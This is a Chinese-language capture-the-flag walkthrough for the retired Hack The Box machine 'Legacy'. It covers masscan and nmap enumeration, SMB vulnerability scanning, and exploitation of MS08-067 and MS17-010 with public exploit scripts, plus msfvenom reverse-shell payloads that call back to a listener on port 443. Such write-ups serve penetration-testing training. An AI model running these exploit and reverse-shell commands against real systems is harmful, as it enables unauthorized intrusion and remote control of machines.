本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.4
本次使用https://github.com/Tib3rius/Traceback进行自动化全方位扫描
信息枚举收集 https://github.com/codingo/Reconnoitre 跟autorecon类似 autorecon 10.10.10.4 -o ./Legacy-autorecon masscan -p1-65535 10.10.10.4 --rate=1000 -e tun0 > ports ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr ' ' ',' | sed 's/,$//') nmap -Pn -sV -sC -p$ports 10.10.10.4
nmap自动探测工具 https://github.com/21y4d/nmapAutomator 使用nmap探测漏洞 kali@kali:~/Downloads/htb/legacy$ ls /usr/share/nmap/scripts/ | grep smb | grep vuln smb2-vuln-uptime.nse smb-vuln-conficker.nse smb-vuln-cve2009-3103.nse smb-vuln-cve-2017-7494.nse smb-vuln-ms06-025.nse smb-vuln-ms07-029.nse smb-vuln-ms08-067.nse smb-vuln-ms10-054.nse smb-vuln-ms10-061.nse smb-vuln-ms17-010.nse smb-vuln-regsvc-dos.nse smb-vuln-webexec.nse sudo nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4 nmap -vvv -p 139,445 --script=smb-vuln-* 10.10.10.4 nmap -p 139,445 --script=smb-vuln* 10.10.10.4 nmap --script smb-vuln-ms17-010 -p 445 10.10.10.4 -Pn 目标存在ms08-067漏洞,直接使用metasploit拿权限 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
这里使用nmap扫描目标靶机可以通过ms08-067和ms17-010这两个漏洞直接利用拿到shell权限,使用工具方便快捷的话就是metasploit即可
提权到最高权限
手动利用-python版本利用ms08-067 https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py https://github.com/nullarmor/hackthebox-exploits/tree/master/legacy kali@kali:~/Downloads/htb/legacy$ python ms08-067.py ####################################################################### # MS08-067 Exploit # This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/). # The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi # # Mod in 2018 by Andy Acer # - Added support for selecting a target port at the command line. # - Changed library calls to allow for establishing a NetBIOS session for SMB transport # - Changed shellcode handling to allow for variable length shellcode. ####################################################################### $ This version requires the Python Impacket library version to 0_9_17 or newer. $ $ Here's how to upgrade if necessary: $ $ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/ $ cd impacket $ pip install . ####################################################################### Usage: ms08-067.py <target ip> <os #> <Port #> Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445 Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX) Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX) Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX) FYI: nmap has a good OS discovery script that pairs well with this exploit: nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1 python ms08-067.py 10.10.10.4 6 445 nc -lvnp 443 可以使用ms17-010漏洞 https://github.com/Johk3/HTB_Walkthrough/tree/master/Legacy https://github.com/worawit/MS17-010 利用上述MS17-010最好都下载下来,利用里面自带的mysmb模块,如果不下载会显示mysmb模块加载失败 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f exe > exploit.exe git clone https://github.com/helviojunior/MS17-010.git cd MS17-010 python send_and_execute.py 10.10.10.4 exploit.exe 手动利用ms17-010 wget https://raw.githubusercontent.com/worawit/MS17-010/master/eternalblue_exploit8.py eternalblue_exploit8.py <ip> <shellcode_file> [numGroomConn] msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.2_443.exe python eternalblue_exploit8.py 10.10.10.4 rev_10.10.14.2_443.exe